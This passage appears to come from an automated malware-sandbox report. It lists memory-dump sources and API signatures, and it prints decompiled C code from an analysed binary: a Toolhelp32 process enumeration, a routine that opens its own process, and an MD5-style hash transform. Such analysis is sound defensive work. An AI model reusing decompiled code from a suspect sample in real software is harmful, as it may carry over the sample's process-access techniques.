                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                                                                                          • Opcode ID: 0589124df6cb99fc5507b0a520340ca4c9ecd64fd9509f0a28c4545cf3a35bae
                                                                                                                                                                                                                                          • Instruction ID: 28efc25f666b3163907fd1afcdcc06182bab373a763f98a35cedc2e93c8df84b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0589124df6cb99fc5507b0a520340ca4c9ecd64fd9509f0a28c4545cf3a35bae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4F0BB726011356BE778AA7AAC88EEF77AEDFC5614F000061EE16C3040EB24D5B687A5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E0040179C() {
                                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                                          				unsigned int _t3;
                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                          				long _t5;
                                                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                                                          				intOrPtr _t10;
                                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t10 =  *0x404130;
                                                                                                                                                                                                                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                          				 *0x40413c = _t1;
                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t3 = GetVersion();
                                                                                                                                                                                                                                          				if(_t3 != 5) {
                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                          					if(_t14 <= 0) {
                                                                                                                                                                                                                                          						_t4 = 0x32;
                                                                                                                                                                                                                                          						return _t4;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					if(_t3 >> 8 > 0) {
                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                          						 *0x40412c = _t3;
                                                                                                                                                                                                                                          						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                          						 *0x404128 = _t5;
                                                                                                                                                                                                                                          						 *0x404130 = _t10;
                                                                                                                                                                                                                                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                          						 *0x404124 = _t6;
                                                                                                                                                                                                                                          						if(_t6 == 0) {
                                                                                                                                                                                                                                          							 *0x404124 =  *0x404124 | 0xffffffff;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t14 = _t3 - _t3;
                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                          0x0040179d
                                                                                                                                                                                                                                          0x004017ab
                                                                                                                                                                                                                                          0x004017b1
                                                                                                                                                                                                                                          0x004017b8
                                                                                                                                                                                                                                          0x0040180f
                                                                                                                                                                                                                                          0x0040180f
                                                                                                                                                                                                                                          0x004017ba
                                                                                                                                                                                                                                          0x004017c2
                                                                                                                                                                                                                                          0x004017cf
                                                                                                                                                                                                                                          0x004017cf
                                                                                                                                                                                                                                          0x0040180b
                                                                                                                                                                                                                                          0x0040180d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004017c4
                                                                                                                                                                                                                                          0x004017cb
                                                                                                                                                                                                                                          0x004017d1
                                                                                                                                                                                                                                          0x004017d1
                                                                                                                                                                                                                                          0x004017d6
                                                                                                                                                                                                                                          0x004017e4
                                                                                                                                                                                                                                          0x004017e9
                                                                                                                                                                                                                                          0x004017ef
                                                                                                                                                                                                                                          0x004017f5
                                                                                                                                                                                                                                          0x004017fc
                                                                                                                                                                                                                                          0x004017fe
                                                                                                                                                                                                                                          0x004017fe
                                                                                                                                                                                                                                          0x00401808
                                                                                                                                                                                                                                          0x004017cd
                                                                                                                                                                                                                                          0x004017cd
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004017cd
                                                                                                                                                                                                                                          0x004017cb

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004011E0), ref: 004017AB
                                                                                                                                                                                                                                          • GetVersion.KERNEL32(?,004011E0), ref: 004017BA
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,004011E0), ref: 004017D6
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004011E0), ref: 004017EF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 845504543-0
                                                                                                                                                                                                                                          • Opcode ID: aed06d6e456db0b12c0d945e50369df40b064ec9bd77893b2d6cd3ad5d18233c
                                                                                                                                                                                                                                          • Instruction ID: 8f8fe06e61bec74b5f5bb4dd3e414479b260bbff587dc6d4cb96878b245eb472
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aed06d6e456db0b12c0d945e50369df40b064ec9bd77893b2d6cd3ad5d18233c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DF081B15413019BE7116F787E097553FA5A799713F104036E681FA2F8E37085818B5C
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                                                                          			E01125920(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                          				void _v76;
                                                                                                                                                                                                                                          				intOrPtr* _t226;
                                                                                                                                                                                                                                          				signed int _t229;
                                                                                                                                                                                                                                          				signed int _t231;
                                                                                                                                                                                                                                          				signed int _t233;
                                                                                                                                                                                                                                          				signed int _t235;
                                                                                                                                                                                                                                          				signed int _t237;
                                                                                                                                                                                                                                          				signed int _t239;
                                                                                                                                                                                                                                          				signed int _t241;
                                                                                                                                                                                                                                          				signed int _t243;
                                                                                                                                                                                                                                          				signed int _t245;
                                                                                                                                                                                                                                          				signed int _t247;
                                                                                                                                                                                                                                          				signed int _t249;
                                                                                                                                                                                                                                          				signed int _t251;
                                                                                                                                                                                                                                          				signed int _t253;
                                                                                                                                                                                                                                          				signed int _t255;
                                                                                                                                                                                                                                          				signed int _t257;
                                                                                                                                                                                                                                          				signed int _t259;
                                                                                                                                                                                                                                          				signed int _t338;
                                                                                                                                                                                                                                          				signed char* _t348;
                                                                                                                                                                                                                                          				signed int _t349;
                                                                                                                                                                                                                                          				signed int _t351;
                                                                                                                                                                                                                                          				signed int _t353;
                                                                                                                                                                                                                                          				signed int _t355;
                                                                                                                                                                                                                                          				signed int _t357;
                                                                                                                                                                                                                                          				signed int _t359;
                                                                                                                                                                                                                                          				signed int _t361;
                                                                                                                                                                                                                                          				signed int _t363;
                                                                                                                                                                                                                                          				signed int _t365;
                                                                                                                                                                                                                                          				signed int _t367;
                                                                                                                                                                                                                                          				signed int _t376;
                                                                                                                                                                                                                                          				signed int _t378;
                                                                                                                                                                                                                                          				signed int _t380;
                                                                                                                                                                                                                                          				signed int _t382;
                                                                                                                                                                                                                                          				signed int _t384;
                                                                                                                                                                                                                                          				intOrPtr* _t400;
                                                                                                                                                                                                                                          				signed int* _t401;
                                                                                                                                                                                                                                          				signed int _t402;
                                                                                                                                                                                                                                          				signed int _t404;
                                                                                                                                                                                                                                          				signed int _t406;
                                                                                                                                                                                                                                          				signed int _t408;
                                                                                                                                                                                                                                          				signed int _t410;
                                                                                                                                                                                                                                          				signed int _t412;
                                                                                                                                                                                                                                          				signed int _t414;
                                                                                                                                                                                                                                          				signed int _t416;
                                                                                                                                                                                                                                          				signed int _t418;
                                                                                                                                                                                                                                          				signed int _t420;
                                                                                                                                                                                                                                          				signed int _t422;
                                                                                                                                                                                                                                          				signed int _t424;
                                                                                                                                                                                                                                          				signed int _t432;
                                                                                                                                                                                                                                          				signed int _t434;
                                                                                                                                                                                                                                          				signed int _t436;
                                                                                                                                                                                                                                          				signed int _t438;
                                                                                                                                                                                                                                          				signed int _t440;
                                                                                                                                                                                                                                          				signed int _t508;
                                                                                                                                                                                                                                          				signed int _t599;
                                                                                                                                                                                                                                          				signed int _t607;
                                                                                                                                                                                                                                          				signed int _t613;
                                                                                                                                                                                                                                          				signed int _t679;
                                                                                                                                                                                                                                          				void* _t682;
                                                                                                                                                                                                                                          				signed int _t683;
                                                                                                                                                                                                                                          				signed int _t685;
                                                                                                                                                                                                                                          				signed int _t690;
                                                                                                                                                                                                                                          				signed int _t692;
                                                                                                                                                                                                                                          				signed int _t697;
                                                                                                                                                                                                                                          				signed int _t699;
                                                                                                                                                                                                                                          				signed int _t718;
                                                                                                                                                                                                                                          				signed int _t720;
                                                                                                                                                                                                                                          				signed int _t722;
                                                                                                                                                                                                                                          				signed int _t724;
                                                                                                                                                                                                                                          				signed int _t726;
                                                                                                                                                                                                                                          				signed int _t728;
                                                                                                                                                                                                                                          				signed int _t734;
                                                                                                                                                                                                                                          				signed int _t740;
                                                                                                                                                                                                                                          				signed int _t742;
                                                                                                                                                                                                                                          				signed int _t744;
                                                                                                                                                                                                                                          				signed int _t746;
                                                                                                                                                                                                                                          				signed int _t748;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t226 = _a4;
                                                                                                                                                                                                                                          				_t348 = __ecx + 2;
                                                                                                                                                                                                                                          				_t401 =  &_v76;
                                                                                                                                                                                                                                          				_t682 = 0x10;
                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                                                                                                                          					_t401 =  &(_t401[1]);
                                                                                                                                                                                                                                          					_t348 =  &(_t348[4]);
                                                                                                                                                                                                                                          					_t682 = _t682 - 1;
                                                                                                                                                                                                                                          				} while (_t682 != 0);
                                                                                                                                                                                                                                          				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                                                                          				_t683 =  *_t6;
                                                                                                                                                                                                                                          				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                                                                          				_t402 =  *_t7;
                                                                                                                                                                                                                                          				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                                                                          				_t349 =  *_t8;
                                                                                                                                                                                                                                          				asm("rol eax, 0x7");
                                                                                                                                                                                                                                          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                                                                                                                          				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                                                                                                                          				asm("ror edx, 0xf");
                                                                                                                                                                                                                                          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                                                                                                                          				asm("ror esi, 0xa");
                                                                                                                                                                                                                                          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                                                                                                                          				_v8 = _t685;
                                                                                                                                                                                                                                          				_t690 = _v8;
                                                                                                                                                                                                                                          				asm("rol eax, 0x7");
                                                                                                                                                                                                                                          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                                                                                                                          				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                                                                                                                          				asm("ror edx, 0xf");
                                                                                                                                                                                                                                          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                                                                                                                                                                                                          				asm("ror esi, 0xa");
                                                                                                                                                                                                                                          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                                                                                                                          				_v8 = _t692;
                                                                                                                                                                                                                                          				_t697 = _v8;
                                                                                                                                                                                                                                          				asm("rol eax, 0x7");
                                                                                                                                                                                                                                          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                                                                                                                          				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                                                                                                                          				asm("ror edx, 0xf");
                                                                                                                                                                                                                                          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                                                                                                                                                                                                          				asm("ror esi, 0xa");
                                                                                                                                                                                                                                          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                                                                                                                          				_v8 = _t699;
                                                                                                                                                                                                                                          				asm("rol eax, 0x7");
                                                                                                                                                                                                                                          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                                                                          				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                                                                                                                          				_t508 =  !_t357;
                                                                                                                                                                                                                                          				asm("ror edx, 0xf");
                                                                                                                                                                                                                                          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                                                                                                                          				_v12 = _t410;
                                                                                                                                                                                                                                          				_v12 =  !_v12;
                                                                                                                                                                                                                                          				asm("ror esi, 0xa");
                                                                                                                                                                                                                                          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                                                                                                                          				asm("rol eax, 0x5");
                                                                                                                                                                                                                                          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                                                                                                                          				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                                                                          				asm("rol edx, 0xe");
                                                                                                                                                                                                                                          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                                                                                                                          				asm("ror esi, 0xc");
                                                                                                                                                                                                                                          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                                                                                                                          				asm("rol eax, 0x5");
                                                                                                                                                                                                                                          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                                                                                                                          				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                                                                                                                          				asm("rol edx, 0xe");
                                                                                                                                                                                                                                          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                                                                                                                          				asm("ror esi, 0xc");
                                                                                                                                                                                                                                          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                                                                                                                          				asm("rol eax, 0x5");
                                                                                                                                                                                                                                          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                                                                                                                          				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                                                                                                                          				asm("rol edx, 0xe");
                                                                                                                                                                                                                                          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                                                                                                                          				asm("ror esi, 0xc");
                                                                                                                                                                                                                                          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                                                                                                                          				asm("rol eax, 0x5");
                                                                                                                                                                                                                                          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                                                                                                                          				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                                                                                                                          				asm("rol edx, 0xe");
                                                                                                                                                                                                                                          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                                                                                                                          				asm("ror esi, 0xc");
                                                                                                                                                                                                                                          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                                                                                                                          				asm("rol eax, 0x4");
                                                                                                                                                                                                                                          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                                                                                                                          				asm("rol ecx, 0xb");
                                                                                                                                                                                                                                          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                                                                                                                          				asm("rol edx, 0x10");
                                                                                                                                                                                                                                          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                                                                                                                          				_t599 = _t367 ^ _t420;
                                                                                                                                                                                                                                          				asm("ror esi, 0x9");
                                                                                                                                                                                                                                          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                                                                                                                          				asm("rol eax, 0x4");
                                                                                                                                                                                                                                          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                                                                                                                          				asm("rol edi, 0xb");
                                                                                                                                                                                                                                          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                                                          				asm("rol edx, 0x10");
                                                                                                                                                                                                                                          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                                                                                                                          				_t338 = _t607 ^ _t422;
                                                                                                                                                                                                                                          				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                                                                                                                          				asm("rol eax, 0x4");
                                                                                                                                                                                                                                          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                                                                                                                          				asm("rol esi, 0xb");
                                                                                                                                                                                                                                          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                                                                                                                          				asm("rol edi, 0x10");
                                                                                                                                                                                                                                          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                                                                                                                          				_t424 = _t734 ^ _t613;
                                                                                                                                                                                                                                          				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                                                                                                                          				asm("rol eax, 0x4");
                                                                                                                                                                                                                                          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                                                                                                                          				asm("rol edx, 0xb");
                                                                                                                                                                                                                                          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                                                                                                                          				asm("rol esi, 0x10");
                                                                                                                                                                                                                                          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                                                                                                                          				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                                                                                                                          				asm("rol eax, 0x6");
                                                                                                                                                                                                                                          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                                                                                                                          				asm("rol edx, 0xa");
                                                                                                                                                                                                                                          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                                                                                                                          				asm("rol esi, 0xf");
                                                                                                                                                                                                                                          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                                                                                                                          				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                                                                                                                          				asm("rol eax, 0x6");
                                                                                                                                                                                                                                          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                                                                                                                          				asm("rol edx, 0xa");
                                                                                                                                                                                                                                          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                                                                                                                          				asm("rol esi, 0xf");
                                                                                                                                                                                                                                          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                                                                                                                          				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                                                                                                                          				asm("rol eax, 0x6");
                                                                                                                                                                                                                                          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                                                                                                                          				asm("rol edx, 0xa");
                                                                                                                                                                                                                                          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                                                                                                                          				asm("rol esi, 0xf");
                                                                                                                                                                                                                                          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                                                                                                                          				asm("ror edi, 0xb");
                                                                                                                                                                                                                                          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                                                                                                                          				asm("rol eax, 0x6");
                                                                                                                                                                                                                                          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                                                                                                                          				asm("rol edx, 0xa");
                                                                                                                                                                                                                                          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                                                                                                                          				_t400 = _a4;
                                                                                                                                                                                                                                          				asm("rol esi, 0xf");
                                                                                                                                                                                                                                          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                                                                                                                          				 *_t400 =  *_t400 + _t259;
                                                                                                                                                                                                                                          				asm("ror eax, 0xb");
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                                                                                                                          				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                                                          			}


































































































                                                                                                                                                                                                                                          0x01125923
                                                                                                                                                                                                                                          0x0112592e
                                                                                                                                                                                                                                          0x01125931
                                                                                                                                                                                                                                          0x01125934
                                                                                                                                                                                                                                          0x01125935
                                                                                                                                                                                                                                          0x01125953
                                                                                                                                                                                                                                          0x01125955
                                                                                                                                                                                                                                          0x01125958
                                                                                                                                                                                                                                          0x0112595b
                                                                                                                                                                                                                                          0x0112595b
                                                                                                                                                                                                                                          0x0112595e
                                                                                                                                                                                                                                          0x0112595e
                                                                                                                                                                                                                                          0x01125961
                                                                                                                                                                                                                                          0x01125961
                                                                                                                                                                                                                                          0x01125964
                                                                                                                                                                                                                                          0x01125964
                                                                                                                                                                                                                                          0x01125981
                                                                                                                                                                                                                                          0x01125984
                                                                                                                                                                                                                                          0x0112599a
                                                                                                                                                                                                                                          0x0112599d
                                                                                                                                                                                                                                          0x011259b7
                                                                                                                                                                                                                                          0x011259ba
                                                                                                                                                                                                                                          0x011259d0
                                                                                                                                                                                                                                          0x011259d3
                                                                                                                                                                                                                                          0x011259d5
                                                                                                                                                                                                                                          0x011259ed
                                                                                                                                                                                                                                          0x011259f0
                                                                                                                                                                                                                                          0x011259f3
                                                                                                                                                                                                                                          0x01125a0b
                                                                                                                                                                                                                                          0x01125a0e
                                                                                                                                                                                                                                          0x01125a28
                                                                                                                                                                                                                                          0x01125a2b
                                                                                                                                                                                                                                          0x01125a41
                                                                                                                                                                                                                                          0x01125a44
                                                                                                                                                                                                                                          0x01125a46
                                                                                                                                                                                                                                          0x01125a5e
                                                                                                                                                                                                                                          0x01125a63
                                                                                                                                                                                                                                          0x01125a66
                                                                                                                                                                                                                                          0x01125a7c
                                                                                                                                                                                                                                          0x01125a7f
                                                                                                                                                                                                                                          0x01125a99
                                                                                                                                                                                                                                          0x01125a9c
                                                                                                                                                                                                                                          0x01125ab2
                                                                                                                                                                                                                                          0x01125ab5
                                                                                                                                                                                                                                          0x01125ab7
                                                                                                                                                                                                                                          0x01125ad2
                                                                                                                                                                                                                                          0x01125ad5
                                                                                                                                                                                                                                          0x01125aec
                                                                                                                                                                                                                                          0x01125aef
                                                                                                                                                                                                                                          0x01125af3
                                                                                                                                                                                                                                          0x01125b0c
                                                                                                                                                                                                                                          0x01125b0f
                                                                                                                                                                                                                                          0x01125b11
                                                                                                                                                                                                                                          0x01125b14
                                                                                                                                                                                                                                          0x01125b2f
                                                                                                                                                                                                                                          0x01125b32
                                                                                                                                                                                                                                          0x01125b4b
                                                                                                                                                                                                                                          0x01125b4e
                                                                                                                                                                                                                                          0x01125b5e
                                                                                                                                                                                                                                          0x01125b61
                                                                                                                                                                                                                                          0x01125b79
                                                                                                                                                                                                                                          0x01125b7c
                                                                                                                                                                                                                                          0x01125b96
                                                                                                                                                                                                                                          0x01125b99
                                                                                                                                                                                                                                          0x01125bb1
                                                                                                                                                                                                                                          0x01125bb4
                                                                                                                                                                                                                                          0x01125bca
                                                                                                                                                                                                                                          0x01125bcd
                                                                                                                                                                                                                                          0x01125be5
                                                                                                                                                                                                                                          0x01125be8
                                                                                                                                                                                                                                          0x01125c00
                                                                                                                                                                                                                                          0x01125c03
                                                                                                                                                                                                                                          0x01125c1d
                                                                                                                                                                                                                                          0x01125c20
                                                                                                                                                                                                                                          0x01125c36
                                                                                                                                                                                                                                          0x01125c39
                                                                                                                                                                                                                                          0x01125c51
                                                                                                                                                                                                                                          0x01125c54
